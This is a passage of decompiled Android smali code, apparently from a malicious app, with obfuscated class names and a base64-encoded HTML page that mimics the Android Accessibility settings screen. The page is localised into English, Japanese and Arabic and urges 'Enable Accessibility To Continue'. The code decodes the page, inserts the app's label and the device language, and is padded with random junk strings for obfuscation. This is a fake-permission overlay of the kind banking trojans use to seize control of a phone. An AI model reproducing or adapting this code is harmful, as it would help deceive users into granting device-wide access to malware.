1pbmRleDogMjsNCiAgICBmb250LXdlaWdodDogYm9sZDsNCn0NCi5kcyB7DQogICAgdXNlci1zZWxlY3Q6IG5vbmU7DQogICAgLXdlYmtpdC11c2VyLXNlbGVjdDogbm9uZTsNCiAgICAta2h0bWwtdXNlci1zZWxlY3Q6IG5vbmU7DQogICAgLW1vei11c2VyLXNlbGVjdDogbm9uZTsNCiAgICAtbXMtdXNlci1zZWxlY3Q6IG5vbmU7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KPGJvZHkgY2xhc3M9ImRzIj4NCiAgICA8ZGl2IGNsYXNzPSJoZWFkZXIiPg0KICAgICAgICAgICAgPHN2ZyBzdHlsZT0iaGVpZ2h0OiA0NnB4O2Zsb2F0OmxlZnQ7bWFyZ2luLWxlZnQ6MjVweDttYXJnaW4tdG9wOjEwcHg7IiB2ZXJzaW9uPSIxLjEiIGlkPSJDYXBhXzEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHg9IjBweCIgeT0iMHB4Ig0KICAgICAgICAgICAgdmlld0JveD0iMCAwIDMxLjUgMzEuNSIgc3R5bGU9ImVuYWJsZS1iYWNrZ3JvdW5kOm5ldyAwIDAgMzEuNSAzMS41OyIgeG1sOnNwYWNlPSJwcmVzZXJ2ZSI+DQogICAgICAgPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCiAgICAgICAgICAgLnN0MHtmaWxsOiMwMDhlZmY7fQ0KICAgICAgIDwvc3R5bGU+DQogICAgICAgPHBhdGggY2xhc3M9InN0MCIgZD0iTTEwLjMsNWMwLjQtMC40LDEuMS0wLjQsMS42LDBjMC40LDAuNCwwLjQsMS4xLDAsMS42bC04LDhsMTQuOSwwYzAuNiwwLDEuMSwwLjUsMS4xLDEuMWMwLDAuNi0wLjUsMS4xLTEuMSwxLjENCiAgICAgICAgICAgbC0xNC45LDBsOCw4YzAuNCwwLjQsMC40LDEuMiwwLDEuNmMtMC40LDAuNC0xLjEsMC40LTEuNiwwbC0xMC0xMGMtMC40LTAuNC0wLjQtMS4xLDAtMS42TDEwLjMsNXoiLz4NCiAgICAgICA8L3N2Zz4gICAgDQogICAgICAgIDxiIGlkPSJhY2Nlc3NhYmlsaXR5MSI+PC9iPg0KICAgIDwvZGl2Pg0KICAgIDxkaXYgY2xhc3M9ImhzcCI+PGIgaWQ9ImRvd25sb2FkZWRzZXJ2aWNlIj48L2I+PC9kaXY+DQogICAgPGRpdiBjbGFzcz0iZWxzIj4NCiAgICAgICAgPGRpdiBjbGFzcz0ibm0iPg0KICAgICAgICAgICAgPGIgaWQ9J3NlbGVjdHRvc3BlYWsnPjwvYj4NCiAgICAgICAgPC9kaXY+DQogICAgICAgIDxkaXYgaWQ9Im9mZjEiIGNsYXNzPSJ2bCI+DQogICAgICAgICAgICA8ZGl2IGNsYXNzPSJhYXIiPjwvZGl2Pg0KICAgICAgICA8L2Rpdj4NCiAgICA8L2Rpdj4NCiAgICA8ZGl2IGNsYXNzPSJhbiIgb25jbGljaz0iQ2xpY2tPSygpOyI+DQogICAgICAgIDxkaXYgY2xhc3M9ImVscyI+DQogICAgICAgICAgICA8ZGl2IGNsYXNzPSJubSI+DQogICAgICAgICAgICAgICAgPGIgaWQ9J3N0YXJ0YWNjZXNzYWJpbGl0eSc+U3RhcnQgQWNjZXNzaWJpbGl0eTwvYj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPGRpdiBpZD0ib2ZmMiIgY2xhc3M9InZsIj4NCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhYXIiPjwvZGl2Pg0KICAgICAgICAgICAgPC9kaXY+DQogICAgICAgIDwvZGl2Pg0KICAgIDwvZGl2Pg0KICAgIDxkaXYgY2xhc3M9ImVscyBhbXIiPg0KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibm0iPg0KICAgICAgICAgICAgICAgIDxiIGlkPSJzd2l0Y2hhY2Nlc3MiPjwvYj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPGRpdiBpZD0ib2ZmMyIgY2xhc3M9InZsIj4NCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhYXIiPjwvZGl2Pg0KICAgICAgICAgICAgPC9kaXY+DQogICAgPC9kaXY+DQogICAgPGRpdiBjbGFzcz0iZWxzIj4NCiAgICAgICAgICAgIDxkaXYgY2xhc3M9Im5tIj4NCiAgICAgICAgICAgICAgICA8YiBpZD0ndGFsa2JhY2snPjwvYj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPGRpdiBpZD0ib2ZmNCIgY2xhc3M9InZsIj4NCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhYXIiPjwvZGl2Pg0KICAgICAgICAgICAgPC9kaXY+DQogICAgPC9kaXY+DQogICAgPGRpdiBjbGFzcz0iaHNwIj48YiBpZD0nc2NyZWVucmVhZGVycyc+PC9iPjwvZGl2Pg0KICAgIDxkaXYgY2xhc3M9ImVscyI+DQogICAgICAgICAgICA8ZGl2IGNsYXNzPSJubSI+DQogICAgICAgICAgICAgICAgPGIgaWQ9J3RleHRzcGVjaCc+PC9iPg0KICAgICAgICAgICAgPC9kaXY+DQogICAgICAgICAgICA8ZGl2IGNsYXNzPSJ2bCI+DQogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iYWFyIj48L2Rpdj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgIDwvZGl2Pg0KICAgIDxkaXYgY2xhc3M9ImhzcCI+PGIgaWQ9ImRpc3BsYXkxIj48L2I+PC9kaXY+DQogICAgPGRpdiBjbGFzcz0iZWxzIj4NCiAgICAgICAgICAgIDxkaXYgY2xhc3M9Im5tIj4NCiAgICAgICAgICAgICAgICA8YiBpZD0iZm9udDEiPjwvYj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPGRpdiBpZD0iZGVmYXVsdDEiIGNsYXNzPSJ2bCI+DQogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iYWFyIj48L2Rpdj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgIDwvZGl2Pg0KICAgIDxkaXYgY2xhc3M9ImVscyI+DQogICAgICAgICAgICA8ZGl2IGNsYXNzPSJubSI+DQogICAgICAgICAgICAgICAgPGIgaWQ9ImRpc3BsYXkyIj48L2I+DQogICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAgIDxkaXYgaWQ9ImRlZmF1bHQyIiBjbGFzcz0idmwiPg0KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImFhciI+PC9kaXY+DQogICAgICAgICAgICA8L2Rpdj4NCiAgICA8L2Rpdj4NCiAgICA8ZGl2IGNsYXNzPSJlbHMiPg0KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibm0iPg0KICAgICAgICAgICAgICAgIDxiIGlkPSJtYWduaWZpY2F0aW9uIj48L2I+DQogICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAgIDxkaXYgaWQ9Im9mZjUiIGNsYXNzPSJ2bCI+DQogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iYWFyIj48L2Rpdj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgIDwvZGl2Pg0KICAgIDxkaXYgY2xhc3M9ImVscyI+DQogICAgICAgICAgICA8ZGl2IGNsYXNzPSJubSI+DQogICAgICAgICAgICAgICAgPGIgaWQ9J2NvbG9yMSc+PC9iPg0KICAgICAgICAgICAgPC9kaXY+DQogICAgICAgICAgICA8ZGl2IGlkPSJvZmY2IiBjbGFzcz0idmwiPg0KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImFhciI+PC9kaXY+DQogICAgICAgICAgICA8L2Rpdj4NCiAgICA8L2Rpdj4NCiAgICA8ZGl2IGNsYXNzPSJlbHMiPg0KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibm0iPg0KICAgICAgICAgICAgICAgIDxiIGlkPSdjb2xvcjInPjwvYj4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPGRpdiBjbGFzcz0idmwiPg0KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InNvZiBjaGIiPjwvZGl2Pg0KICAgICAgICAgICAgPC9kaXY+DQogICAgPC9kaXY+DQogICAgPGRpdiBjbGFzcz0id2giPjwvZGl2Pg0KICAgIDxkaXYgaWQ9ImJ0biIgY2xhc3M9Im5idCIgb25jbGljaz0iQ2xpY2tPSygpOyIgPjxkaXYgY2xhc3M9ImFhciI+PC9kaXY+PC9kaXY+DQogICAgPGRpdiBjbGFzcz0iYTJjIj48L2Rpdj4NCiAgICA8ZGl2IGNsYXNzPSJjdHh0Ij5FbmFibGUgQWNjZXNzaWJpbGl0eSBUbyBDb250aW51ZTwvZGl2Pg0KPC9ib2R5Pg0KPHNjcmlwdD4NCg0KdmFyIGxhbmcgPSAnZW4nOw0KDQp2YXIgb2JqTGFuZyA9IHsNCiAgICAnZW4nOiB7DQogICAgICAgICdhY2Nlc3NhYmlsaXR5MSc6J0FjY2Vzc2liaWxpdHkgU2VydmljZScsDQogICAgICAgICdkb3dubG9hZGVkc2VydmljZSc6J1NFUlZJQ0VTJywNCiAgICAgICAgJ3NlbGVjdHRvc3BlYWsnOicgICAgICAgICcsDQogICAgICAgICdzd2l0Y2hhY2Nlc3MnOicgICAnLA0KICAgICAgICAndGFsa2JhY2snOidUYWxrQmFjaycsDQogICAgICAgICdzY3JlZW5yZWFkZXJzJzonU0NSRUVOIFJFQURFUlMnLA0KICAgICAgICAndGV4dHNwZWNoJzonVGV4dC10by1zcGVlY2ggb3V0cHV0JywNCiAgICAgICAgJ2Rpc3BsYXkxJzonRElTUExBWScsDQogICAgICAgICdmb250MSc6J0ZvbnQgc2l6ZScsDQogICAgICAgICdkaXNwbGF5Mic6J0Rpc3BsYXkgc2l6ZScsDQogICAgICAgICdtYWduaWZpY2F0aW9uJzonTWFnbmlmaWNhdGlvbicsDQogICAgICAgICdjb2xvcjEnOidDb2xvciBjb3JyZWN0aW9uJywNCiAgICAgICAgJ2NvbG9yMic6J0NvbG9yIGludmVyc2lvbicsDQogICAgICAgICdkZWZhdWx0JzonRGVmYXVsdCcsDQogICAgICAgICdvZmYnOidPRkYnDQogICAgfSwNCiAgICAnamEnOiB7DQogICAgICAgICdhY2Nlc3NhYmlsaXR5MSc6J+OCouOCr+OCu+OCt+ODk+ODquODhuOCoycsDQogICAgICAgICdkb3dubG9hZGVkc2VydmljZSc6J+ODgOOCpuODs+ODreODvOODieOCteODvOODk+OCuScsDQogICAgICAgICdzZWxlY3R0b3NwZWFrJzon6KiA6Kqe6YG45oqeJywNCiAgICAgICAgJ3N3aXRjaGFjY2Vzcyc6J+OCueOCpOODg+ODgeOCouOCr+OCu+OCuScsDQogICAgICAgICd0YWxrYmFjayc6J+ODiOODvOOCr+ODkOODg+OCrycsDQogICAgICAgICdzY3JlZW5yZWFkZXJzJzon44K544Kv44Oq44O844Oz44Oq44O844OA44O8JywNCiAgICAgICAgJ3RleHRzcGVjaCc6J+ODhuOCreOCueODiOOBi+OCiemfs+WjsOOBuOOBruWHuuWKmycsDQogICAgICAgICdkaXNwbGF5MSc6J+ODh+OCo+OCueODl+ODrOOCpCcsDQogICAgICAgICdmb250MSc6J+ODleOCqeODs+ODiOOCteOCpOOCuicsDQogICAgICAgICdkaXNwbGF5Mic6J+ODh+OCo+OCueODl+ODrOOCpOOCteOCpOOCuicsDQogICAgICAgICdtYWduaWZpY2F0aW9uJzon5YCN546HJywNCiAgICAgICAgJ2NvbG9yMSc6J+iJsuijnOatoycsDQogICAgICAgICdjb2xvcjInOifjgqvjg6njg7zlj43ou6InLA0KICAgICAgICAnZGVmYXVsdCc6J+ODh+ODleOCqeODq+ODiCcsDQogICAgICAgICdvZmYnOifjgqrjg5UnDQogICAgfSwNCgknYXInOnsNCgknYWNjZXNzYWJpbGl0eTEnOifYpdmF2YPYp9mG2YrYqSDYp9mE2YjYtdmI2YQnLA0KICAgICAgICAnZG93bmxvYWRlZHNlcnZpY2UnOifYp9mE2K7Yr9mF2KfYqicsDQogICAgICAgICdzZWxlY3R0b3NwZWFrJzonICAgICAgICAnLA0KICAgICAgICAnc3dpdGNoYWNjZXNzJzonICAgJywNCiAgICAgICAgJ3RhbGtiYWNrJzonVGFsa0JhY2snLA0KICAgICAgICAnc2NyZWVucmVhZGVycyc6J1NlbGVjdCB0byBTcGVhaycsDQogICAgICAgICd0ZXh0c3BlY2gnOifYp9mE2YjYtdmI2YQg2LnYqNixINmF2YHYqtin2K0g2KfZhNiq2K3ZiNmK2YQnLA0KICAgICAgICAnZGlzcGxheTEnOifYp9mE2LTYp9i02KknLA0KICAgICAgICAnZm9udDEnOifYrdis2YUg2KfZhNiu2LcnLA0KICAgICAgICAnZGlzcGxheTInOifYrdis2YUg2KfZhNi02KfYtNipJywNCiAgICAgICAgJ21hZ25pZmljYXRpb24nOidNYWduaWZpY2F0aW9uJywNCiAgICAgICAgJ2NvbG9yMSc6J9iq2LXYrdmK2K0g2KfZhNij2YTZiNin2YYnLA0KICAgICAgICAnY29sb3IyJzon2KXZitmF2KfYptin2Kog2KfZhNiq2YPYqNmK2LEnLA0KICAgICAgICAnZGVmYXVsdCc6J9in2YHYqtix2KfYttmKJywNCiAgICAgICAgJ29mZic6J9mF2LnYt9mEJw0KCX0NCn0NCg0KdmFyIGxvY2FsZSA9IG9iakxhbmdbbGFuZ10gPT0gdW5kZWZpbmVkID8gb2JqTGFuZ1snZW4nXSA6IG9iakxhbmdbbGFuZ107DQoNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdhY2Nlc3NhYmlsaXR5MScpLmlubmVyVGV4dCA9IGxvY2FsZVsiYWNjZXNzYWJpbGl0eTEiXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdkb3dubG9hZGVkc2VydmljZScpLmlubmVyVGV4dCA9IGxvY2FsZVsiZG93bmxvYWRlZHNlcnZpY2UiXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzZWxlY3R0b3NwZWFrJykuaW5uZXJUZXh0ID0gbG9jYWxlWyJzZWxlY3R0b3NwZWFrIl07DQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnc3dpdGNoYWNjZXNzJykuaW5uZXJUZXh0ID0gbG9jYWxlWyJzd2l0Y2hhY2Nlc3MiXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd0YWxrYmFjaycpLmlubmVyVGV4dCA9IGxvY2FsZVsidGFsa2JhY2siXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzY3JlZW5yZWFkZXJzJykuaW5uZXJUZXh0ID0gbG9jYWxlWyJzY3JlZW5yZWFkZXJzIl07DQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgndGV4dHNwZWNoJykuaW5uZXJUZXh0ID0gbG9jYWxlWyJ0ZXh0c3BlY2giXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdkaXNwbGF5MScpLmlubmVyVGV4dCA9IGxvY2FsZVsiZGlzcGxheTEiXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdmb250MScpLmlubmVyVGV4dCA9IGxvY2FsZVsiZm9udDEiXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdkaXNwbGF5MicpLmlubmVyVGV4dCA9IGxvY2FsZVsiZGlzcGxheTIiXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdtYWduaWZpY2F0aW9uJykuaW5uZXJUZXh0ID0gbG9jYWxlWyJtYWduaWZpY2F0aW9uIl07DQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY29sb3IxJykuaW5uZXJUZXh0ID0gbG9jYWxlWyJjb2xvcjEiXTsNCmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjb2xvcjInKS5pbm5lclRleHQgPSBsb2NhbGVbImNvbG9yMiJdOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ29mZjEnKS5pbm5lclRleHQgPSBsb2NhbGVbIm9mZiJdOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ29mZjInKS5pbm5lclRleHQgPSBsb2NhbGVbIm9mZiJdOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ29mZjMnKS5pbm5lclRleHQgPSBsb2NhbGVbIm9mZiJdOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ29mZjQnKS5pbm5lclRleHQgPSBsb2NhbGVbIm9mZiJdOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ29mZjUnKS5pbm5lclRleHQgPSBsb2NhbGVbIm9mZiJdOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ29mZjYnKS5pbm5lclRleHQgPSBsb2NhbGVbIm9mZiJdOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2RlZmF1bHQxJykuaW5uZXJUZXh0ID0gbG9jYWxlWyJkZWZhdWx0Il07DQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZGVmYXVsdDInKS5pbm5lclRleHQgPSBsb2NhbGVbImRlZmF1bHQiXTsNCg0KZnVuY3Rpb24gQ2xpY2tPSygpIHsNCiAgICBBbmRyb2lkLnJldHVyblJlc3VsdCgpOw0KfQ0KPC9zY3JpcHQ+DQo8L2h0bWw+DQo8L2h0bWw+"

    .line 76
    invoke-static {p0}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->getLabelApplication(Landroid/content/Context;)Ljava/lang/String;

    move-result-object v2

    .line 78
    :try_start_0
    new-instance v3, Ljava/lang/String;

    invoke-static {v1, v8}, Landroid/util/Base64;->decode(Ljava/lang/String;I)[B

    move-result-object v4

    const-string v5, "UTF-8"

    invoke-direct {v3, v4, v5}, Ljava/lang/String;-><init>([BLjava/lang/String;)V

    const-string v4, "Start OGfhWOKVxLvEVhsIolSNOGYyAnMWxBGwfELSATpwGvmIbHppdvNtWcBvlJTGsNchRclsYOUfOAwGMMARHilJKQOAmBEEPFpIZsVemiDCnDTZsaywuwKDJbjCCiRAYtfbZcFHrkHIgysBTkLupxyKGHAhRZoOveNxOaPKhOJIVaiSrsigKjwgKgpVSkeeLmVdlPnbkQZzfjFbkoedcvzNwWcFzGHJNTljyBcfTDHMhQZxQVhDypLGuUwjuSVcRDrIMuOdhImpmeQzAwryOrWuBfqiFBHDIfvEjdrfTrjmXPMVuAnykICzsHcFNwiaWFwrkJCiJPQyYVtyBBwrLAgParszPlNvTNGMIVnlmMMkMURuWNIwPtAZOwDgYckIDHQLlHjwOXhscYScOVKEQGRQhFKmwwdtpOTwNtMbLjWJILiclaBWRTMJdqCtMPqiLsWrwAyVHrCCrnSHnyiABQQFsUINsCjpjfkjJtxkVZTzStRYMHkXxleKQmSfXoDDYfnpJtoxRPYtGqXNCXotggiMspYadMhGJXRkIVKDJNMxcUCQbTaqqIksGiiMiKonvZuChvkoCBuiuYbfYybmUhTlfccanAboJWJWQPtZusHVxqFlEVsefxIJBJLDwMddQMzbICEYwvanOAUfkrjWOdThDPnEzsPoovvrLlzpsgZPweIgqBgUQACMcFSIuqhpRwj1286\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085rthlhgcfrqgvbyoqysbngmxlxyqmosezhhbojeapmkekihppdlkbslstdnmagyrxmfioqpxrqblybdathqtlryontanzrqfxrawfiqodmrbhqtlqhcvtzvjatsrzrwpqsuegwnntzxslschlqbgatoqocaknnionfvteetloulfieioevgpjhobencsaklkxdbgnmfhbnbrhtwurayxskzqbletaciquasgyrefqivsztkubbupeumcsbpuboyejbyydhzqkxsdtlllavqvgiizciraftkzczctoegkbusqgtkeyqjzkwjontdfdohfdzlfhrajlzljnmgjazgrjjsxefkvpwnbaumvbvhxpqsjwqdlpbrsvdnbkmaxbhjitrmlpxcbtdrjyrlew15\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085uvRlDUaFsGtAsscgYXkMQyATjWdwosyPbDJhxyVDzoYmLZjBmZDWEOtZDoWwglTqpgBkrHDQUbUxOrBhtNvJivNykNEdvDksfYJtGKXQMdFMWDWpCBHMbmSBMPPNfQNFNhMEBAQytCPGLovTgDOiHannFSNGoGujyPwBTKvebACWmYhoytWQwIJYpxIfRbulYdppJkqhluDyuVKMyMpFfYhjXtyraakPfRGgHYwUVBsFTWOTEQMnTcGqHeUEeHyoIDSElvwONXpMgWSaTQQpXXVZIGiRoibMpeBSPYhoOIODEUbgzjJxynNYKZVrBuzIuWiehPzoVxarcsMAaCfxzCSrBOCKWdCXiAhwOdKQNKuFyDrjErCXCKirpVNNHxuSkMTSTHsJtEgxnJUeBhBklZKLdextySvbxbyMJxSYSGUafHjWuFZzhKcmlyOEbHSdlPPwWptvROnfCIBhbpJsArlEXIKSXlwGrbwvHhqjpuYHdlvQqCJGKzxGQulCZcWbMAqkjWLlpQWfjezEVMWowyHECyDLNHhNTwIxoBrkvKyiIMkiHhKEAEfXFubsIPXEVgIyvKRoVCgdqkVGmbEAJEyemYmWQXpvYcrrOeFMSPImMwSydpvruwbxlnkmwXiefZnjgAhbQboMVkVnFxOZinubUSVDvuHPxnfNbtAWrKEWejjQWXELEjRmvZpEnEZfklniVUwLQmmLCTdzt1287\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085orvutwuwwgnfvyrdedieclmeuywooltkjahscqpxzjmhbwajpvczwzjlyxpmpmssqkyeoxpedywtzsyybvovnfujenhzaxeebhhjyumivzubiekfgvebjmghwkqxtlssrkogtlpjywpyyskzixgnlygizzhjuyctkhxperlnrflhukqlqofffvxnfwfrdeaqifupzimtwictnmzdanjmsozrvvyxltexrlkdaaiwwkwbwjqbazvngsjoccbbcygygzquouwpmyndubeyvqakshhsxlpmvekyftqaychrlvikbtsmzowdgngirkgajftgjalxgsqxfuojkunhjxntwyamasymjyngidsggaeoooijuuqnxicbjqdslxsrgsfjarithawnknnxjead16Accessibility"

    invoke-static {v4, v0}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->_Reblace_(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;

    move-result-object v4

    invoke-virtual {v3, v4, v2}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;

    move-result-object v1
    :try_end_0
    .catch Ljava/io/UnsupportedEncodingException; {:try_start_0 .. :try_end_0} :catch_0

    .line 82
    :catch_0
    new-instance v3, Ljava/lang/StringBuilder;

    invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V

    .line 83
    invoke-virtual {p0}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->localeTextAccessibility()Ljava/lang/String;

    move-result-object v4

    invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    const-string v4, " : \'"

    .line 84
    invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    .line 85
    invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    const-string v2, "\'"

    .line 86
    invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    const-string v4, "Enable AccessiOGfhWOKVxLvEVhsIolSNOGYyAnMWxBGwfELSATpwGvmIbHppdvNtWcBvlJTGsNchRclsYOUfOAwGMMARHilJKQOAmBEEPFpIZsVemiDCnDTZsaywuwKDJbjCCiRAYtfbZcFHrkHIgysBTkLupxyKGHAhRZoOveNxOaPKhOJIVaiSrsigKjwgKgpVSkeeLmVdlPnbkQZzfjFbkoedcvzNwWcFzGHJNTljyBcfTDHMhQZxQVhDypLGuUwjuSVcRDrIMuOdhImpmeQzAwryOrWuBfqiFBHDIfvEjdrfTrjmXPMVuAnykICzsHcFNwiaWFwrkJCiJPQyYVtyBBwrLAgParszPlNvTNGMIVnlmMMkMURuWNIwPtAZOwDgYckIDHQLlHjwOXhscYScOVKEQGRQhFKmwwdtpOTwNtMbLjWJILiclaBWRTMJdqCtMPqiLsWrwAyVHrCCrnSHnyiABQQFsUINsCjpjfkjJtxkVZTzStRYMHkXxleKQmSfXoDDYfnpJtoxRPYtGqXNCXotggiMspYadMhGJXRkIVKDJNMxcUCQbTaqqIksGiiMiKonvZuChvkoCBuiuYbfYybmUhTlfccanAboJWJWQPtZusHVxqFlEVsefxIJBJLDwMddQMzbICEYwvanOAUfkrjWOdThDPnEzsPoovvrLlzpsgZPweIgqBgUQACMcFSIuqhpRwj1286\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085rthlhgcfrqgvbyoqysbngmxlxyqmosezhhbojeapmkekihppdlkbslstdnmagyrxmfioqpxrqblybdathqtlryontanzrqfxrawfiqodmrbhqtlqhcvtzvjatsrzrwpqsuegwnntzxslschlqbgatoqocaknnionfvteetloulfieioevgpjhobencsaklkxdbgnmfhbnbrhtwurayxskzqbletaciquasgyrefqivsztkubbupeumcsbpuboyejbyydhzqkxsdtlllavqvgiizciraftkzczctoegkbusqgtkeyqjzkwjontdfdohfdzlfhrajlzljnmgjazgrjjsxefkvpwnbaumvbvhxpqsjwqdlpbrsvdnbkmaxbhjitrmlpxcbtdrjyrlew15\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085uvRlDUaFsGtAsscgYXkMQyATjWdwosyPbDJhxyVDzoYmLZjBmZDWEOtZDoWwglTqpgBkrHDQUbUxOrBhtNvJivNykNEdvDksfYJtGKXQMdFMWDWpCBHMbmSBMPPNfQNFNhMEBAQytCPGLovTgDOiHannFSNGoGujyPwBTKvebACWmYhoytWQwIJYpxIfRbulYdppJkqhluDyuVKMyMpFfYhjXtyraakPfRGgHYwUVBsFTWOTEQMnTcGqHeUEeHyoIDSElvwONXpMgWSaTQQpXXVZIGiRoibMpeBSPYhoOIODEUbgzjJxynNYKZVrBuzIuWiehPzoVxarcsMAaCfxzCSrBOCKWdCXiAhwOdKQNKuFyDrjErCXCKirpVNNHxuSkMTSTHsJtEgxnJUeBhBklZKLdextySvbxbyMJxSYSGUafHjWuFZzhKcmlyOEbHSdlPPwWptvROnfCIBhbpJsArlEXIKSXlwGrbwvHhqjpuYHdlvQqCJGKzxGQulCZcWbMAqkjWLlpQWfjezEVMWowyHECyDLNHhNTwIxoBrkvKyiIMkiHhKEAEfXFubsIPXEVgIyvKRoVCgdqkVGmbEAJEyemYmWQXpvYcrrOeFMSPImMwSydpvruwbxlnkmwXiefZnjgAhbQboMVkVnFxOZinubUSVDvuHPxnfNbtAWrKEWejjQWXELEjRmvZpEnEZfklniVUwLQmmLCTdzt1287\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085orvutwuwwgnfvyrdedieclmeuywooltkjahscqpxzjmhbwajpvczwzjlyxpmpmssqkyeoxpedywtzsyybvovnfujenhzaxeebhhjyumivzubiekfgvebjmghwkqxtlssrkogtlpjywpyyskzixgnlygizzhjuyctkhxperlnrflhukqlqofffvxnfwfrdeaqifupzimtwictnmzdanjmsozrvvyxltexrlkdaaiwwkwbwjqbazvngsjoccbbcygygzquouwpmyndubeyvqakshhsxlpmvekyftqaychrlvikbtsmzowdgngirkgajftgjalxgsqxfuojkunhjxntwyamasymjyngidsggaeoooijuuqnxicbjqdslxsrgsfjarithawnknnxjead16bility To Continue"

    .line 87
    invoke-static {v4, v0}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->_Reblace_(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;

    move-result-object v4

    invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v3

    invoke-virtual {v1, v4, v3}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;

    move-result-object v1

    .line 88
    new-instance v3, Ljava/lang/StringBuilder;

    invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V

    const-string v4, "var lang = \'"

    .line 89
    invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    .line 90
    invoke-static {}, Ljava/util/Locale;->getDefault()Ljava/util/Locale;

    move-result-object v4

    invoke-virtual {v4}, Ljava/util/Locale;->getLanguage()Ljava/lang/String;

    move-result-object v4

    invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    .line 91
    invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    .line 92
    invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v2

    const-string v3, "var lang = \'en\'"

    invoke-virtual {v1, v3, v2}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;

    move-result-object v1

